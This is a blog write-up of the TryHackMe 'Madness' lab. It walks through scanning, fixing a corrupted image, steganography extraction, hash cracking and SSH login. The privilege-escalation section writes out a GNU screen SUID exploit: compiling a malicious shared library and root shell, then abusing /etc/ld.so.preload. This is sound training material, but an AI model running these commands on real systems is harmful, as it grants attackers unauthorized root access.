TryHackMe: Madness

Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.152.45

Let’s check the site

As you can see, there is a picture icon above. Let’s click on it.

There are no picture. Let’s download and make some changes.

Command: wget http://10.10.152.45/thm.jpg

The .jpg file is corrupted. Let’s fix it.

Command: hexeditor thm.jpg

Now let’s try again.

We are provided with a hidden directory.

I was just checking and came across something like this.

There was another hint in the source code.

Open burpsuite and check one by one

And that’s it. We got different results

When we look at the site, we get such a result.

Maybe the image we download needed again. Because this is the steganography code.

Command: steghide info thm.jpg

Command: steghide — extract -sf thm.jpg

Let’s try to crack the hash we got

I tried to access the information we have with ssh, but it didn’t work. After a while, I remembered that it was in the form of supplements.
Let’s check.

We found the password, let’s enter.

Privilege Escalation

Command: find / -perm -u=s 2>/dev/null

We see something different. Let’s check the exploit.

I created the files in my terminal and transferred them to the target terminal

And I entered the commands.

Command: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

Command: gcc -o /tmp/rootshell /tmp/rootshell.c

Command: echo “[+] Now we create our /etc/ld.so.preload file…”

Command: cd /etc

Command: umask 000

Command: screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”

Command: echo “[+] Triggering…”

Command: screen -ls

Command: /tmp/rootshell

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The Dark Side of Supporting an Open-Source Project

Observability is Not Just Logging or Metrics

Stop Coding What Already Exists

To Automate API Tests or FrontEnd Tests?

How To Create A Grid Layout For Divi Modules With CSS

How To Create A Grid Layout For Divi Modules With CSS

The majority of Awaited Offers Are Very Close To YouNow! https://t.co/aiZw4YTeVy

4+2 Layered Architecture

The bad, the ugly, the weak and the good.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Plotted-TMS: TryHackMe

Celestial Writeup

TryHackMe: Write-Up Linux PrivEsc — Capstone Challenge